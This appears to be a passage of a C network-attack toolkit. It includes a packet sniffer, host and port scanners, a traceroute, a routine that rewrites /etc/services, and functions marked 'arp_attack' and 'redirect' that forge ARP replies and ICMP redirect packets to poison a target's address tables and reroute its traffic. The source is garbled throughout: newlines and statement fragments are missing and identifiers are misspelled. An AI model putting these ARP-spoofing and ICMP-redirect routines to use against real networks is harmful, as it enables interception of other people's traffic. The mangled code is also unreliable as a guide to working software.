");exit(0);}#ifdef __linuxif( (s=socket(AF_INET,SOCK_PACKET,htons(ETH_P_ALL)))<0 ){perror("socket");exit(0);}if(strcmp(ifname,"x10")!=0) {memset(&sa,0,sizeof(sa));sa.sa_family=AF_INET;strcpy(sa.sa_data,ifname);if(bind(s,&sa,sizeof(sa))<0){perror("bind");exit(0);}}#elseif((s=open_bpf(ifname))<0)exit(0);bpf_len=0;#endifwhile(1){#ifndef __linuxif(bpf_len<=0){if( (bpf_len=read(s,buff,MAXSIZE))<0 ){perror("read");exit(0);}bp=(struct bpf_hdr *)}else{bp=(struct bpf hdr *)( (char *)bp+bp->bh_hdrlen+bp->bh_caplen);bp=(struct bpf hdr *)BPF_WORDALIGN((int)bp);}p=po=(char *)bp+bp->bh_len=bp->bh_#ifdef DEBUGprintf("bpf_len=%d,",bpf_len);printf("hdrlen=%d,",bp->hdrlen);printf("caplen=%d,",bp->bh_caplen);printf("datalen=%d
",bp->bh_datalen);#endif bpf_len-=BPF_WORDLIGN(bp->bh_hdrlen+bp->bh_caplen); #else if((len=read(s,buff,MAXSIZE))<0){perror("read");exit(0);}p= po=#endifdisp=OFF;eth=(struct ether_header *)p;p=p+sizeof(struct ether_header);if(ntohs(eth->ether_type)==ETHERTYPE_ARP){if(opt[ARP]==ON) {if(opt[ETHER]==ON)print_ethernet(eth);arp=(struct ether_arp *)p;print_arp(arp);disp=ON;}}else if (ntohs(eth->ether_type)==ETHERTYPE_IP){ip=(struct ip *)p;p=p+((int)(ip->ip_hl)<<2);if(opt[IP]==ON && opt[TCP]==OFF &&opt[UDP]==OFF && opt[ICMP]==OFF){if(opt[ETHER]==ON)print_ethernet(eth);print_ip(ip);disp=ON;}switch(ip->ip_p){case IPPROTO_TCP:tcp=(struct tcphdr *)p;# ifdef _FAVOR_BSD_p=p+((int)(tcp->th_off)<<2);#elsep=p+((int)(tcp->doff)<<2);#endifif(opt[TCP]==ON){if(opt[IP]==ON){if(opt[ETHER]==ON)print_ethernet(eth);print_ip(ip);}print_tcp(tcp);disp=ON;}case IPPROTO_ICMP:icmp=(struct icmp *)p;p=p+sizeof(struct udphdr);if(opt[ICMP]==ON){if(opt[IP]==ON){if(opt[ETHER]==ON)print_ethernet(eth);print_ip(ip);}print_icmp(icmp);disp=ON;}default:if(opt[ALL]==ON) {if(opt[IP]==ON){if(opt[ETHER]==ON)print_ethernet(eth);print_ip(ip);}printf("Protocol:unknow
");disp=ON;}}}else{if(opt[ALL]==ON){if(opt[ETHER]==ON)print_ethernet(eth);printf("protocol unknow
");disp=ON;}}if(disp==ON) {if(opt[DUMP]==ON)dump_packet(po,len);printf("
");}}return EXIT_SUCCESS; }/***************************** arp_attack ************************************/void m_arp(int argc,char *argv[]){struct ether_header *struct ether_arp *char recv_buff[4096];char send_buff[4096];char *char *char *char mac_addr[6];int tmp[6];#ifndef __linuxstruct bpf_hdr *int bpf_#else#endifu_int dst_char ifname[256];flag=NORMAL;if(argc==5){if(strcmp(argv[OPTION],"reply")==0)flag=REPLY;else if(strcmp(argv[OPTION],"request")==0)flag=REQUEST;else{exit(0);}}else if (argc!=4){exit(0);}strcpy(ifname,argv[IFNAME]);dst_ip=inet_addr(argv[DST_IP4]);if(sscanf(argv[MAC_ADDR],"%x:%x:%x:%x:%x:%x",&tmp[0],&tmp[1],&tmp[1],&tmp[3],&tmp[4],&tmp[5])!=6){printf("MAC address error %s
",argv[MAC_ADDR]);exit(0);}for(i=0;i<6;i++)mac_addr[i]=tmp[i];#ifdef __linuxif( (s=socket(PF_PACKET,SOCK_PACKET,htons(ETH_P_ALL)))<0 ){perror("socket");exit(0);}memset(&sa,0,sizeof(sa));sa.sa_family=PF_PACKET;strcpy(sa.sa_data,ifname);if(bind(s,&sa,sizeof(sa))<0){perror("bind");exit(0);}#elseif( (s=open_bpf(ifname))<0 )exit(0);bpf_len=0;#endifwhile(1){#ifndef __linuxif(bpf_len<=0){if( (bpf_len=read(s,recv_buff,4096))<0 ){perror("read");exit(0);}bp=(struct bpf_hdr *)recv_}else{bp=(struct bpf_hdr *)((char *)bp+bp->bh_hdrlen);bp=(struct bpf_hdr *)BPF_WORDALIGH ((int)bp) ;}rp=rpo=(char *)bp+bp->bh_len=bp->bh_#ifdef DEBUGprintf("bpf_len=%d
",bpf_len);printf("hdrlen=%d
",bp->bh_hdrlen);printf("caplen=%d
",bp->caplen);printf("datalen=%d
",bp->bh_datalen);#endifbpf_len-=BPF_WORDALIGN(bp->bh_hdrlen+bp->bh_caplen);#elseif( (len=read(s,recv_buff,4096))<0 ){perror("read");exit(0);}rp=rpo=recv_#endifeth=(struct ether_header *)rp=rp+sizeof(struct ether_header);if( memcmp(eth->ether_dhost,mac_addr,6)!=0&& memcmp(eth->ether_shost,mac_addr,6)!=0&& ntohs(eth->ether_type)==ETHERTYPE_ARP){arp=(struct ether_arp *)if( dst_ip==*(int *)(arp->arp_spa)){static char zero[6];static char one[6]={0xff,0xff,0xff,0xff,0xff,0xff};printf("Hit............Linuxcici");print_ethernet(eth);print_arp(arp);sp=send_buff+sizeof(struct ether_header);if(flag==REPLY){make_arp((struct ether_arp *)sp,ARPOP_REPLY,mac_addr,arp->arp_tpa,arp->arp_sha,arp->arp_sha);make_ethernet((struct ether_header *)send_buff,arp->arp_sha,mac_addr,ETHERTYPE_ARP);}else if (flag==REQUEST){make_arp((struct ether_arp *)sp,ARPOP_REQUEST,mac_addr,arp->arp_spa,zero,arp->arp_tpa);make_ethernet((struct ether_header *)send_buff,one,mac_addr,ETHERTYPE_ARP);}else{make_arp((struct ether_arp *)sp,ARPOP_REQUEST,mac_addr,arp->arp_tpa,zero,arp->arp_spa);make_ethernet((struct ether_header *)send_buff,arp->arp_sha,mac_addr,ETHERTYPE_ARP);}len=sizeof(struct ether_header)+sizeof(struct ether_arp);usleep(500*1000);#ifndef __linuxif(write(s,send_buff,len)<0){perror("write");exit(0);}#elseif(sendto(s,send_buff,len,0,&sa,sizeof(sa))<0){perror("sendto");exit(0);}#endifprintf("SEND---------------------my Master linuxcici");print_ethernet((struct ether_header *)send_buff);print_arp((struct ether_arp *)sp);}}}exit(1);}void make_ethernet(struct ether_header *eth,u_char *ether_dhost,u_char *ether_shost,u_short ether_type){memcpy(eth->ether_dhost,ether_dhost,6);memcpy(eth->ether_shost,ether_shost,6);eth->ether_type=htons(ether_type);}void make_arp(struct ether_arp *arp,int op,u_char *arp_sha,u_char *arp_spa,u_char *arp_tha,u_char 
*arp_tpa){arp->arp_hrd=htons(1);arp->arp_pro=htons(ETHERTYPE_IP);arp->arp_hln=6;arp->arp_pln=4;arp->arp_op=htons(op);memcpy(arp->arp_sha,arp_sha,6);memcpy(arp->arp_spa,arp_spa,4);memcpy(arp->arp_tha,arp_tha,6);memcpy(arp->arp_tpa,arp_tpa,4);}/***************************** arp_attack ************************************//***************************** scan_route ************************************/void scan_route(int argc,char *argv[]){struct packet_struct sockaddr_in send_int send_ int recv_ u_char buff[512];struct timeval tvm0;struct timeval tvm1;fd_int on=1; int dns_flg=0;if(argc==3 && strcmp(argv[1],"-n")==0){dns_flg=1; argv[1]=argv[2]; argv[2]=NULL;argc=2;}if(argc!=2){fprintf(stderr, "usage: %s [-n] dst_ip
",argv[CMD_NAME]);exit(EXIT_FAILURE);}memset( (char *)&send_sa,0,sizeof(struct sockaddr_in) );send_sa.sin_family=AF_INET;if( (send_sa.sin_addr.s_addr=inet_addr(argv[DST_IP3]))==INADDR_NONE ){struct hostent * if( (he=gethostbyname(argv[DST_IP3]))==NULL ){fprintf(stderr,"unknow host %s
",argv[DST_IP3]);exit(EXIT_FAILURE);}send_sa.sin_family=he->h_ memcpy( (char *)&(send_sa.sin_addr),he->h_addr,sizeof(he->h_length) ); }if( (send_sd=socket(AF_INET, SOCK_RAW,IPPROTO_RAW))<0 ){perror("socket(SOCK_RAW)");exit(EXIT_FAILURE);} if( setsockopt(send_sd,IPPROTO_IP,IP_HDRINCL,&on,sizeof(on))<0 ){perror("setsockopt(IPPROTO_IP,IP_HDRINCL)");exit(EXIT_FAILURE);}if( (recv_sd=socket(AF_INET,SOCK_RAW,IPPROTO_ICMP))<0 ) {perror("socket(SOCKET_RAW)");exit(EXIT_FAILURE);}len=sizeof(struct packet_udp);memset( (char *)&sendpacket,0,sizeof(struct packet_udp) ); make_udp_header(&(sendpacket.udp)); make_ip_header2(&(sendpacket.ip),0,send_sa.sin_addr.s_addr,len);printf("scanroute %s
",inet_ntoa(send_sa.sin_addr)); for(ttl=1;ttl<=64;ttl++){printf("%2d:",ttl); fflush(stdout); sendpacket.ip.ip_ttl=for(i=0;i<3;i++){if(sendto(send_sd,(char *)&sendpacket,len,0,(struct sockaddr *)&send_sa,sizeof (send_sa))<0){perror("sendto");exit(EXIT_FAILURE);}gettimeofday(&tvm0,(struct timezone *)0);tv.tv_sec=3;tv.tv_usec=0;reread:FD_ZERO(&readfd); FD_SET(recv_sd,&readfd);if( (select(recv_sd+1, &readfd,NULL,NULL,&tv))>0 ){ struct icmp * struct ip *struct hostent * char hostip[256];struct in_if( recvfrom(recv_sd,buff,512,0,NULL,NULL)<0 ){perror("recvfrom");exit(EXIT_FAILURE);}ip=(struct ip *)hlen=ip->ip_hl<<2; if( ip->ip_p !=IPPROTO_ICMP)icmp=(struct icmp *)(buff+hlen);if( (icmp->icmp_type!=ICMP_TIMXCEED|| icmp->icmp_code !=ICMP_TIMXCEED_INTRANS)&& (icmp->icmp_type!=ICMP_UNREACH_PORT) ) gettimeofday(&tvm1,(struct timezone *)0);tvsub(&tvm1,&tvm0);memcpy(&ipaddr,&(ip->ip_src.s_addr),sizeof (ipaddr));strcpy(hostip,inet_ntoa(* (struct in_addr *)&(ip->ip_src.s_addr)));if(dns_flg==1)printf("% -15s",hostip);else if( (host=gethostbyaddr( ( char *)&ipaddr,4,AF_INET))==NULL )printf(" % -15s(%s)",host,hostip); else printf("% -15s(%s)",hostip,host->h_name); printf(": RTT= %8.4fms",tvm1.tv_sec * 1000.0 +tvm1.tv_usec/1000.0);if(icmp->icmp_type==ICMP_UNREACH_PORT){printf("Reach !
");}else}else{printf("unknow
");fflush(stdout);}}printf("
");}exit:close(send_sd);close(recv_sd);exit(1);}void make_ip_header2(struct ip *ip,int srcip,int dstip,int iplen){memset( (char *)ip,0,sizeof(struct ip) );ip->ip_v=IPVERSION;ip->ip_hl=sizeof(struct ip) >> 2;ip->ip_id=htons(0);ip->ip_off=0;#ifdef _linux_ ip->ip_len=htons(iplen);ip->ip_off=htons(0); #else ip->ip_len=ip->ip_off=0;#endif ip->ip_ttl=64; ip->ip_p=IPPROTO_UDP; ip->ip_src.s_addr=ip->ip_dst.s_addr= ip->ip_sum=0;ip->ip_sum=checksum( (u_short *)ip,sizeof(struct ip) );}/***************************** scan_route ************************************//***************************** redirect ************************************/void redirect(int argc,char *argv[]){struct sockaddr_unsigned char buff[1500]; struct ip *ip_ struct ip *ip_ struct icmp * struct udphdr *
int on=1; if(argc!=5){fprintf(stderr,"usage %s targetd_host old_router new_router dst_ip
",argv[CMD_NAME]); exit(EXIT_FAILURE);}if(setsockopt(s,IPPROTO_IP,IP_HDRINCL,(char *)&on,sizeof(on))<0){perror("setsockopt(IP_HDRINCL)"); exit(EXIT_FAILURE);} ip_new=(struct ip *)(buff); icmp=(struct icmp *)(buff+20); ip_old=(struct ip *)(buff+20+8); udp=(struct udphdr *)(buff+20+8+20); size=20+8+20+8; make_udp_header(udp); make_ip_header(ip_old,inet_addr(argv[TARGET_IP]),inet_addr(argv[DST_IP1]),IPPROTO_UDP,100);make_icmp5_header(icmp,inet_addr(argv[NEW_ROUTER])); make_ip_header(ip_new,inet_addr(argv[OLD_ROUTER]), inet_addr(argv[TARGET_IP]),IPPROTO_ICMP,size);memset( (char *)&dest,0,sizeof(dest) ); dest.sin_family=AF_INET; dest.sin_addr.s_addr=inet_addr(argv[TARGET_IP]);if( sendto (s,buff,size,0,(struct sockaddr *)&dest,sizeof(dest))<0 ){perror("sendto"); exit(EXIT_FAILURE);}exit(1);}void make_udp_header(struct udphdr *udp){#ifdef _FAVOR_BSD_udp->uh_sport=htons(0); udp->uh_ulen=htons( (u_short)sizeof(struct udphdr) ); udp->uh_dport=htons(33434); udp->uh_sum=htons(0);#elseudp->source=htons(0); udp->len=htons( (u_short)sizeof(struct udphdr) ); udp->dest =htons(33434); udp->check=htons(0);#endif}void make_ip_header(struct ip *ip,int target_ip,int dst_ip,int proto,int iplen){memset( (char *)ip,0,sizeof(struct ip) ); ip->ip_v=IPVERSION; ip->ip_hl=sizeof(struct ip) >> 2; ip->ip_id=htons(0); ip->ip_off=0; #ifdef _linux_ ip->ip_len=htons(iplen); ip->ip_off=htons(IP_DF); #else ip->ip_len= ip->ip_off=IP_DF; #endif ip->ip_ttl=2; ip->ip_p= ip->ip_src.s_addr=target_ ip->ip_dst.s_addr=dst_ ip->ip_sum=0; ip->ip_sum=checksum( (u_short *)ip,sizeof(struct ip) );}void make_icmp5_header( struct icmp *icmp,u_int gw_ip ){icmp->icmp_type=ICMP_REDIRECT; icmp->icmp_code=ICMP_REDIRECT_HOST; icmp->icmp_gwaddr.s_addr=gw_ icmp->icmp_cksum=0; icmp->icmp_cksum=checksum( (u_short *)icmp,8+20+8 );}/***************************** redirect ************************************//***************************** scan udp port ************************************/void scan_uport(int argc,char 
*argv[]){printf("
Running scan udp port programe my master linuxcici
");getchar();struct icmp *fd_set select_struct sockaddr_in send_int send_sd,recv_char buff[8192];if(argc!=5){fprintf(stderr,"usage:%s dst_ip start_ip last_port
",argv[CMD_NAME]);exit(EXIT_FAILURE);}send_sa.sin_family=AF_INET;send_sa.sin_addr.s_addr=inet_addr(argv[DST_IP]);startport=atoi(argv[START_PORT]);endport=atoi(argv[LAST_PORT]);if((send_sd=socket(AF_INET,SOCK_DGRAM,0))<0){perror("socket(SOCK_DGRAM)");exit(EXIT_FAILURE);}if((recv_sd=socket(AF_INET,SOCK_RAW,IPPROTO_ICMP))<0){perror("socket(SOCKET_RAW)");exit(EXIT_FAILURE);}for( dstport=dstport<=dstport++ ){printf("scan port%d
",dstport);fflush(stdout);send_sa.sin_port=htons(dstport);sendto(send_sd,NULL,0,0,(void *)&send_sa,sizeof(send_sa));tv.tv_sec=1;tv.tv_usec=0;while(1){FD_ZERO(&select_fd);FD_SET(recv_sd,&select_fd);if( select(recv_sd+1,&select_fd,NULL,NULL,&tv)<=0 )struct ip *if(recvfrom(recv_sd,buff,8192,0,NULL,NULL)!=56) ip=(struct ip *)hlen=ip->ip_hl<<2;icmp=(struct icmp *)(buff+hlen);port=ntohs(*(u_short *)(buff+20+8+20+2));if((ip->ip_src.s_addr!=send_sa.sin_addr.s_addr)||(icmp->icmp_type!=ICMP_UNREACH)||(icmp->icmp_code!=ICMP_UNREACH_PORT)||(port!=dstport) )else {struct servent *se=getservbyport(htons(dstport),"udp");printf("%5d %-20s
",dstport,(se==NULL)? "unknow":se->s_name);} }}printf("
THXY College
");printf("it's done my master Linuxcici
");exit(1);}/***************************** scan udp port ************************************//***************************** scan port ************************************/void scan_port(int argc,char *argv[]){printf("
Running scan port programe my master linuxcici
");getchar();struct icmp *fd_set select_struct sockaddr_in send_int send_sd,recv_char buff[8192];if(argc!=5){fprintf(stderr,"usage:%s dst_ip start_ip last_port
",argv[CMD_NAME]);exit(EXIT_FAILURE);}send_sa.sin_family=AF_INET;send_sa.sin_addr.s_addr=inet_addr(argv[DST_IP]);startport=atoi(argv[START_PORT]);endport=atoi(argv[LAST_PORT]);if((send_sd=socket(AF_INET,SOCK_DGRAM,0))<0){perror("socket(SOCK_DGRAM)");exit(EXIT_FAILURE);}if((recv_sd=socket(AF_INET,SOCK_RAW,IPPROTO_ICMP))<0){perror("socket(SOCKET_RAW)");exit(EXIT_FAILURE);}for( dstport=dstport<=dstport++ ){printf("scan port%d
",dstport);fflush(stdout);send_sa.sin_port=htons(dstport);sendto(send_sd,NULL,0,0,(void *)&send_sa,sizeof(send_sa));tv.tv_sec=1;tv.tv_usec=0;while(1){FD_ZERO(&select_fd);FD_SET(recv_sd,&select_fd);if( select(recv_sd+1,&select_fd,NULL,NULL,&tv)<=0 )struct ip *if(recvfrom(recv_sd,buff,8192,0,NULL,NULL)!=56)ip=(struct ip *)hlen=ip->ip_hl<<2;icmp=(struct icmp *)(buff+hlen);port=ntohs(*(u_short *)(buff+20+8+20+2));if((ip->ip_src.s_addr!=send_sa.sin_addr.s_addr)||(icmp->icmp_type!=ICMP_UNREACH)||(icmp->icmp_code!=ICMP_UNREACH_PORT)||(port!=dstport) )else {struct servent *se=getservbyport(htons(dstport),"udp");printf("%5d %-20s
",dstport,(se==NULL)? "unknow":se->s_name);} }}printf("
THXY College
");printf("it's done my master Linuxcici
");exit(1);}/***************************** scan port ************************************//******************************** scan host ***********************************/void scan_host(int argc,char *argv[]){printf("
Running scan host programe my master linuxcici
");getchar();struct sockaddr_in send_char send_buff[PACKET_LEN];char recv_buff[BUFSIZE];fd_struct ip *if(argc!=4){fprintf(stderr,"usage %s start_ip last_ip
",argv[CMD_NAME]);exit(EXIT_FAILURE);}startip=ntohl(inet_addr(argv[START_IP]));endip=ntohl(inet_addr(argv[LAST_IP]));memset( (char *)&send_sa,0,sizeof(struct sockaddr_in) );send_sa.sin_family=AF_INET;if( (s=socket(AF_INET,SOCK_RAW,IPPROTO_ICMP) )<0){perror("socket(SOCK_RAW,IPPRPTO_ICMP)");exit(EXIT_FAILURE);}for(dstip=dstip<=dstip++){send_sa.sin_addr.s_addr=htonl(dstip);for(i=0;i<3;i++){printf("scan %s(%d)
",inet_ntoa(send_sa.sin_addr),i+1);fflush(stdout);make_icmp8_packet((struct icmp *)send_buff,PACKET_LEN,i);if( sendto(s,(char *)&send_buff,PACKET_LEN,0,(struct sockaddr *)&send_sa,sizeof(send_sa))<0 ){perror("sendto");exit(EXIT_FAILURE);}tv.tv_sec=0;tv.tv_usec=200*1000;while(1){FD_ZERO(&readfd); FD_SET(s,&readfd);if( (select(s+1,&readfd,NULL,NULL,&tv) ) <=0 )if( recvfrom(s,recv_buff,BUFSIZE,0,NULL,NULL)<0 ){perror("recvfrom");exit(EXIT_FAILURE);}ip=(struct ip*)recv_hlen=ip->ip_hl<<2; if(ip->ip_src.s_addr==send_sa.sin_addr.s_addr){struct icmp *icmp=(struct icmp *)(recv_buff+hlen);if(icmp->icmp_type==ICMP_ECHOREPLY){printf(" %-15s",inet_ntoa(*(struct in_addr *)&(ip->ip_src.s_addr)));gettimeofday(&tv,(struct timezone *)0);tvsub(&tv,(struct timeval *)(icmp->icmp_data));printf(": RTT=%8.4fms
",tv.tv_sec*1000.0+tv.tv_usec/1000.0);goto exit_}} }} exit_loop: ;}close(s);printf("
THXY College
");printf("it's done my master Linuxcici
");exit(1);}/******************************** scan host ***********************************//******************************** kill server ***********************************/char* yi_wei(char *server_save,int flag){char *r_w,*p;r_w=(char *)malloc(100* sizeof(char)); if(flag==1){*(r_w)='#';for(i=0;*(server_save+i)!=''&&*(server_save+i)!='
';i++)*(r_w+i+1)=*(server_save+i);*(r_w+i+1)='
';*(r_w+i+2)='';}else{for(i=0;*(server_save+i)!=''&&*(server_save+i)!='
';i++){if( *(server_save+i+1)=='')*(r_w+i)=*(server_save+i+1);*(r_w+i+1)='';}}memset(server_save,' ',100);strcpy(server_save,r_w);free(r_w);return server_}void off(int argc,char *argv[],char *server_save,FILE *tmp_s){char *p,*f_s;int i=0,count=0;for(;*(argv[3]+i)!='';i++ ){if( *(argv[3]+i)==*(server_save+i) ) count++;}if(i==count){f_s=yi_wei(server_save,1);int i=0;i=0;while( *(server_save+i)!=''){fputc(*(server_save+i),tmp_s);i++;}}else{int b=0;while( *(server_save+b)!=''){fputc(*(server_save+b),tmp_s);b++;}}}void on(int argc,char *argv[],char *server_save,FILE *tmp_s){char *p,*f_s;int i=0,count=0; for(;*(argv[3]+i)!='';i++ ){if( (*(argv[3]+i)==*(server_save+i+1) )&& *(server_save)=='#') count++;}if(i==count){f_s=yi_wei(server_save,0); int i=0;i=0;while( *(server_save+i)!=''){fputc(*(server_save+i),tmp_s);i++;}}else{int b=0;while( *(server_save+b)!=''){fputc(*(server_save+b),tmp_s);b++;}}}void kill_serve(int argc, char *argv[]){char server_save[100];char *server_name="/etc/services";char *tmp_name="/etc/tmp_linux";int server_FILE *server_file,*tmp_s;if(argc<4){printf("
usage: the wrong argument open/close+servername
");exit(0);}if((server_file=fopen(server_name,"r+"))==NULL){perror("can't not open server process");exit(0);}if((tmp_s=fopen(tmp_name,"w+"))==NULL){perror("can't not open server process");exit(0);}fseek(server_file,0,SEEK_SET);if( strcmp("OPEN",argv[2])==0){server_state=OPEN;}else if( strcmp("CLOSE",argv[2])==0){server_state=CLOSE;}else{printf("usage : it's not open or close
");exit(0);}while(( fgets(server_save,100,server_file) )){if(server_state==OPEN)on(argc,argv,server_save,tmp_s);if(server_state==CLOSE)off(argc,argv,server_save,tmp_s);memset(server_save,' ',100);}if(unlink("/etc/services")<0){perror("unlink failure");exit(0);}if( chdir("/etc")<0){perror("can't chdir");exit(0);} if(rename("/etc/tmp_linux","/etc/services")<0){perror("rename failure");exit(0);}printf("THXY College
");printf("
nmy Master linuxcici, it's done
");fclose(server_file); fclose(tmp_s); exit(1);}/******************************** kill server **********************************/void dump_packet(unsigned char *buff,int len){int i,j;printf("FrameDump:
");for(i=0;i<i+=16){for(j=i;j<i+16 && j< j++){printf("%02x",buff[j]);if(j%2==1)printf(" ");}if(j==len && len % 16!=0)for(j=0;j<40-(len%16)*2.5;j++)printf(" ");printf(":");for(j=i;j<i+16 && j<j++){if( (buff[j]>=0x20)&&(buff[j]<=0x7e))putchar(buff[j]);elseprintf(".");}printf("
");}fflush(stdout);}void print_udp(struct udphdr *udp){#ifdef _FAVOR_BSD_printf("Protocol:UDP
");printf("Source Port:%5u
Dest Port:%5u
",ntohs(udp->uh_sport),ntohs(udp->uh_dport));printf("Length:%5u Checksum%5u
",ntohs(udp->uh_ulen),ntohs(udp->uh_sum));#elseprintf("Protocol:UDP
");printf("Source Port:%5u
Dest Port:%5u
",ntohs(udp->source),ntohs(udp->dest));printf("Length:%5u Checksum%5u
",ntohs(udp->len),ntohs(udp->check));#endif}char *tcp_ftoa(int flag){static int f[]={'U','A','P','R','S','F'};static char str[17];u_int mask=1<<5;for(i=0;i<6;i++){if( ((flag<<i)&mask)!=0 )str[i]=f[i];elsestr[i]='0';}str[i]='';}void print_tcp(struct tcphdr *tcp){#ifndef __linuxprintf("Protocol:TCP
");printf("Source Port:%5u
Destination Port %5u
",ntohs(tcp->th_sport),ntohs(tcp->th_dport));printf("Sequence Number:%10lu
",(u_long)ntohl(tcp->th_seq));printf("Acknowledgement Number :%10lu
",(u_long)ntohl(tcp->th_ack));printf("Do: %2u
Reserved F:%6s
Window size:%5u
",tcp->th_off,tcp_ftoa(tcp->th_flag),ntohs(tcp->th_win));printf("Checksum: %5u
Urgent Pointer: %5u ",ntohs(tcp->th_sum),ntohs(tcp->th_urp));#elseprintf("Protocol:TCP
");printf("Source Port:%5u
Destination Port %5u
",ntohs(tcp->source),ntohs(tcp->dest));printf("Sequence Number:%10lu
",(u_long)ntohl(tcp->seq));printf("Acknowledgement Number :%10lu
",(u_long)ntohl(tcp->ack_seq));printf("Do: %2u
Window size:%5u
",tcp->doff,ntohs(tcp->window));printf("Checksum: %5u
Urgent Pointer: %5u ",ntohs(tcp->check),ntohs(tcp->urg_ptr));#endif }void print_icmp(struct icmp *icmp){static char *type_name[]={"Echo Reply","Undefine","Undefine","Destination Unreachable","Source Quench","Redirect(changeroute)","Undefine","Undefine","Echo Request","Undefine","Undefine","Time Exceeded","Parameter Problem","Timestamp Request","Timestamp Reply","Infromation Reply","Address Mask Request","Address Mask Reply","Unknow",};int type=icmp->icmp_if(type10)type=19;printf("Protocol: ICMP(%s)
",type_name[type]);printf("Type: %3u
Checksum:%5u
",icmp->icmp_type,icmp->icmp_code,ntohs(icmp->icmp_cksum));if( icmp->icmp_type==0 || icmp->icmp_type==8 ){printf("Identification: %5u
Sequence Number: %5u
",ntohs(icmp->icmp_id),ntohs(icmp->icmp_seq));printf("-------------------------------------------
");}else if(icmp->icmp_type==3){if(icmp->icmp_code==4){printf("void:%5u
Next MTU:%5u
",ntohs(icmp->icmp_pmvoid),ntohs(icmp->icmp_nextmtu));printf("-------------------------------------------
");}else{printf("Unused:%10lu
",(u_long)ntohl(icmp->icmp_void));printf("-------------------------------------------
");}}else if(icmp->icmp_type==5){printf("Router IP Address:%15s
",inet_ntoa(*(struct in_addr *)&(icmp->icmp_gwaddr)));printf("-------------------------------------------
");}else if(icmp->icmp_type==11){printf("Unused: %10lu
",(u_long)ntohl(icmp->icmp_void));printf("-------------------------------------------
");}if( icmp->icmp_type==3 || icmp->icmp_type==5 || icmp->icmp_type==11 )print_ip( (struct ip *)( ((char *)icmp)+8 ) );}char *ip_ttoa(int flag){static int f[]={'1','1','1','D','T','R','C','X',};static char str[17];u_int mask=0x80;for(i=0;i<8;i++){if( ((flag<<i)&mask)!=0 )str[i]=f[i];elsestr[i]='0';}str[i]='';}char *ip_ftoa(int flag){static int f[]={'R','D','M'};static char str[17];u_int mask=0x8000; for(i=0;i<3;i++) {if( ((flag<<i)&mask)!=0 )str[i]=f[i];elsestr[i]='0';}str[i]='';}void print_ip(struct ip *ip){printf("Protocol: IP
");printf("IV: %1u
Total Length:%10u
",ip->ip_v,ip->ip_hl,ip_ttoa(ip->ip_tos),ntohs(ip->ip_len));printf("Identifier: %5u
",ntohs(ip->ip_id),ip_ftoa(ntohs(ip->ip_off)),ntohs(ip->ip_off)&IP_OFFMASK);printf("TTL:%3u
Header Checksum:%5u
",ip->ip_ttl,ip->ip_p,ntohs(ip->ip_sum));printf("Source IP Address: %15s
",inet_ntoa(* (struct in_addr *)&(ip->ip_src) ) );printf("Destination IP Address: %15s
",inet_ntoa( *(struct in_addr *)&(ip->ip_dst )) );}void print_arp(struct ether_arp *arp){static char *arp_operation[]={"Undefine","(ARP Request)","(ARP REPLY)","(RARP Request)","(RARP Reply)",};int op=ntohs(arp->ea_hdr.ar_op);if(op<=0 || 5<op) op=0;printf("Protocol:ARP
");printf("Hard Type: %2u %-11s
",ntohs(arp->ea_hdr.ar_hrd),(ntohs(arp->ea_hdr.ar_hrd)==ARPHRD_ETHER)?"(Ethernet)":"Not Ether" ); printf("Protocol: 0x%04x %-9s
",ntohs(arp->ea_hdr.ar_pro),(ntohs(arp->ea_hdr.ar_pro==ETHERTYPE_IP))? "(IP)":"(NOT IP)");printf("Hardlen :%3u
AddrLen:%2u
OP: %4d %16s
",arp->ea_hdr.ar_hln,arp->ea_hdr.ar_pln,ntohs(arp->ea_hdr.ar_op),arp_operation[op]);printf("Source MAX Address:%17s
",mac_ntoa(arp->arp_sha));printf("Source IP Address:%15s
",inet_ntoa(*(struct in_addr *)&arp->arp_spa));printf("Destination MAC Address: %17s
",mac_ntoa(arp->arp_tha));printf("Destination IP Address: %15s
",inet_ntoa(*(struct in_addr *)&arp->arp_tpa));}void print_ethernet(struct ether_header *eth){int type=ntohs(eth->ether_type);if(type<=1500)printf("IEEE 802.3 Ethernet Frame");elseprintf("Ethernet Fram:
");printf("Destination MAC Address:%17s
",mac_ntoa(eth->ether_dhost));printf("Source MAX Address:%15s
",mac_ntoa(eth->ether_shost));if(type<1500)printf("Length: %5u
",type);elseprintf("Ethernet Type: 0X%04x
",type);}char *mac_ntoa(u_char *d){static char str[50];sprintf(str,"%02x:%02x:%02x:%02x:%02x:%02x",d[0],d[1],d[2],d[3],d[4],d[5]);}#ifndef __linuxint open_buf(char *ifname){char buf[256];for(i=0;i<4;i++){sprintf(buf,"/dev/bpf%d",i);if( (bpfd=open(buf,O_RDWR,0))>0 )goto bpf_}fprintf(stderr,"cannot open BPF
");return -1;bpf_ok: ;strcpy(ifr.ifr_name,ifname);if( ioctl(bpfd,BIOCSETIF,&ifr)<0 ){sprintf(buf,"ioctl(BIOCSETIF,'%S')",ifname);perror(buf);return -1;}fprintf(stderr,"BPF readfrom '%s'(%s)
",ifr.ifr_name,buf);if(ioctl(bpfd,BIOCPROMISC,NULL)<0){perror("ioctl(BIOCPROMISC)");return -1;}i=1;if( ioctl(bpfd,BIOCIMMEDIATE,&i)<0 ){perror("ioctl(BIOCIMMEDIATE)");return -1;}}#endif void make_icmp8_packet( struct icmp *icmp,int len,int n ){memset( (char *)icmp,0,len );gettimeofday((struct timeval *)(icmp->icmp_data),(struct timezone *)0);icmp->icmp_type=ICMP_ECHO;icmp->icmp_code=0;icmp->icmp_id=0;icmp->icmp_seq=n;icmp->icmp_cksum=0;icmp->icmp_cksum=checksum((u_short *)icmp,len);}u_short checksum(u_short *data,int len){u_long sum=0;for(;len>1;len-=2){sum+=*data++;if(sum & 0x)sum=(sum & 0xffff)+(sum>>16);}if(len==1){u_short i=0;*(u_char *)(&i)=*(u_char *)sum+=i;}while(sum>>16)sum=(sum & 0xffff)+(sum>>16);return(sum==0xffff)? sum: ~}void tvsub(struct timeval *out ,struct timeval *in){if((out->tv_usec-=in->tv_usec)<0){out->tv_sec--;out->tv_usec+=1000000; }out->tv_sec-=in->tv_}